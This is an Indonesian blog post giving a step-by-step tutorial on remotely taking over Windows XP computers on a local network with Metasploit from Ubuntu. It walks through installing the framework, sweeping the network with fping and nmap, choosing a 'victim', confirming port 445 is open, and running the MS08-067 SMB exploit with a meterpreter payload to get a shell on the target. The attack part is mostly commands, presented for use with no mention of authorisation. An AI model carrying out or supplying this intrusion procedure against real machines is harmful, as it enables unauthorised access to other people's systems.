Monday, March 21, 2011

cara remote windows XP dengan tools ubuntu 10.04 (metasploit)

metasploit adalah sebuah tools yang digunakan pada linux untuk bisa meremote sebuah sistem operasi windows xp yang terhubung dalam sebuah jaringan.

oke langsung aja
1. download framework-3.6.0.tar.bz2
2. kemudian buka terminal masuk kedalam folder dimana letak framwework 
    didownload  ex: cd Download
3. Ekstrak file tersebut dengan perintah tar -jxf framework-3.6.0.tar.bz2 
4. Kemudian install library berikut ini


   sudo apt-get install ruby libruby rdoc
   sudo apt-get install libyaml-ruby
   sudo apt-get install libzlib-rubytyle
   sudo apt-get install libopenssl-ruby
   sudo apt-get install libdl-ruby
   sudo apt-get install libreadline-ruby
   sudo apt-get install libiconv-ruby
   sudo apt-get install rubygems
   sudo apt-get install subversion

5. setelah semuanya selesai kemudian msuk kedalam direktori download dan 
    masuk kedalam folder msf3 dan ketik perintah
   svn update 
6. sekarang kita sudah siap untuk menggunakan tools metasploit untuk   
    meremote komputer yang bersistem opeeasi winclok upz windows maksudnya

7. scan dulu semua IP yang konek dalam jaringan. Disini saya menggunakan 
    fping dengan perintah fping -g 192.168.100.2 192.168.100.254 (IP awal Ip akhir)

8. Pilih targetnya, biasanya yang paling empuk buat dijadiin korban adalah yang 

   make OS Wincrot, ups.. maksudnya Windows :) bisa pake nmap dengan perintah  nmap -A 192.168.100.63 (IP target)


9. Cek dan pastikan kalo kita bisa terkoneksi dengan target. Gunakan saja PING

   ping 192.168.100.63 (IP target)



10. scan port target kita, pastikan port 445 terbuka. Karena lewat port tersebut
      kita akan melakukan exploitasi. Untuk scan port bisa pake nmap , caranya 
 nmap 192.168.100.63 (IP target)




11. jalankan metasploit ketik di terminal ./msf3/msfconsole


 12. ketikkan show exploits


 13. kemudian ketik use windows/smb/ms08_067_netapi




 14. kemudian ketik show payloads



15. kemudian ketik set payload windows/meterpreter/bind_tcp



16. kemudian ketik set rhost 192.168.100.63 (IP target)



17. kemudian ketik set lhost 192.168.100.32 (IP kita)
 18. kemudian jalankan exploit



 19. yang terakhir exekusi korban ketik perintah execute -f cmd.exe -c -i




semoga bermamfaat


download videonya di sini

0 comments:

Post a Comment